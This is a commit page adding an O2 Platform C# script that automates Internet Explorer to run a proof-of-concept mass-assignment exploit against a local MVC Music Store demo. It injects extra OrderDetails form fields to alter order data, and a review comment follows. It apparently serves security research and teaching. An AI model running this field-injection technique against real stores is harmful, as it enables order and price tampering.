
First O2 script with IE Automation and exploit

1 parent ea763a9 commit a701d6967a2111c308d59424bc7578003698ff44 @DinisCruz DinisCruz committed May 14, 2012
Showing with 120 additions and 0 deletions.
  1. +120 −0 O2_Scripts/PoC - MVC Music Store exploit 1.h2
@@ -0,0 +1,120 @@
+<?xml version="1.0"?>
+<H2>
+ <SourceCode>
+var ie = "ie_Fyila".o2Cache&lt;WatiN_IE&gt;(()=&gt; panel.clear().add_IE()).silent(true); // ie ramdon value for o2cache makes this object to unique amongst multiple instances of this control
+
+var site = "http://localhost.:26641";
+//ie.if_NoPageLoaded(()=&gt; ie.open(site));
+
+ie.disableFlashing();
+//ie.enableFlashing();
+
+Action&lt;string,string&gt; login =
+ (username, password)=&gt;{
+ if (ie.title().eq("Log On").isFalse())
+ ie.open(site + "/Account/LogOn");
+
+ ie.field("UserName").value(username);
+ ie.field("Password").value(password);
+ ie.button("Log On").click();
+ };
+Action&lt;string,string,string&gt; register =
+ (username, password,email)=&gt;{
+ ie.open(site + "/Account/Register");
+ ie.field("UserName").value(username);
+ ie.field("Email").value(email);
+ ie.field("Password").value(password);
+ ie.field("ConfirmPassword").value(password);
+ ie.button("Register").click();
+ };
+Action loginAsTestUser =
+ ()=&gt;{
+ var user1_name = "test_user".add_RandomLetters(5);
+ var user1_email = "test@testuser.com";
+ var user1_pwd = "a pwd".add_RandomLetters(10);
+ register(user1_name, user1_pwd, user1_email);
+ //ie.open(site + "/Account/LogOff");
+ //login(user1_name, user1_pwd);
+ };
+
+Action selectTestProductAndCheckout =
+ ()=&gt;{
+ ie.link("Rock").scrollIntoView().flash().click();
+ ie.link("Surfing with the Alien (Remastered)").scrollIntoView().flash().click();
+ ie.link("Add to cart").flash().click();
+ ie.link("Checkout &gt;&gt;").flash().click();
+ };
+
+Action populateSubmitOrder =
+ ()=&gt;{
+ var Address = "...Address";
+ var City = "...City";
+ var Country = "...Country";
+ var Email = "Email@email.com";
+ var FirstName = "...FirstName";
+ var LastName = "...LastName";
+ var Phone = "...Phone";
+ var PostalCode = "AAA BBB";
+ var State = "...State";
+ var PromoCode = "FREE"; // currently hard coded promotional code
+
+ ie.field("Address").value(Address);
+ ie.field("City").value(City);
+ ie.field("Country").value(Country);
+ ie.field("Email").value(Email);
+ ie.field("FirstName").value(FirstName);
+ ie.field("LastName").value(LastName);
+ ie.field("Phone").value(Phone);
+ ie.field("PostalCode").value(PostalCode);
+ ie.field("PromoCode").value(PromoCode);
+ ie.field("State").value(State);
+ };
+Action submitOrder =
+ ()=&gt;{
+ ie.button("Submit Order").click();
+ };
+
+Action createOrderUsingTestUser =
+ ()=&gt;{
+ loginAsTestUser();
+ selectTestProductAndCheckout();
+ populateSubmitOrder();
+ submitOrder();
+ };
+
+
+Action&lt;string,string&gt; injectField =
+ (fieldName, value)=&gt;{
+ ie.field("FirstName")
+ .injectHtml_afterEnd("&lt;br&gt;{0}:&lt;input type=text name='{0}' value='{1}'/&gt;".format(fieldName, value));
+ };
+
+Action runExploit_1 =
+ ()=&gt;{
+ loginAsTestUser();
+ selectTestProductAndCheckout();
+ populateSubmitOrder();
+
+ //the following simulates adding this to the POST request: OrderDetails[0].OrderDetailId=1&amp;OrderDetails[0].OrderId=1&amp;OrderDetails[0].AlbumId=1&amp;OrderDetails[0].Quantity=1&amp;OrderDetails[0].UnitPrice=2000&amp;
+ injectField("OrderDetails[0].OrderDetailId","1");
+ injectField("OrderDetails[0].OrderId","1");
+ injectField("OrderDetails[0].AlbumId","1");
+ injectField("OrderDetails[0].Quantity","1");
+ injectField("OrderDetails[0].UnitPrice","2001");
+ submitOrder();
+ ie.open(site + "/OrderDetails");
+ };
+
+
+//selectTestProductAndCheckout();
+runExploit_1();
+
+
+return "done";
+
+
+//O2File:WatiN_IE_ExtensionMethods.cs
+//O2Ref:WatiN.Core.1x.dll
+//O2Tag_DontAddExtraO2Files; </SourceCode>
+ <ReferencedAssemblies />
+</H2>
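Review bot: The comment above the `injectField` calls in `runExploit_1` lists `OrderDetails[0].UnitPrice=2000`, but the call below it sends `"2001"`, so a reader checking the resulting order cannot tell which value the PoC is expected to produce; the two should agree. The script also returns `"done"` right after opening `/OrderDetails` without inspecting the page, so it reports the same result whether or not the server bound the extra `OrderDetails[0].*` fields. This looks like an over-posting (mass-assignment) check against the checkout form, and if it is meant to serve as a regression test, the expected outcome should be written down next to the exploit step, for example `// expected once fixed: posted OrderDetails[0].* fields are ignored and the order holds only the cart's own line item`. Separately, `loginAsTestUser` only calls `register` (the log-off and `login` calls are commented out), so a name such as `registerTestUser` would describe it more accurately.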
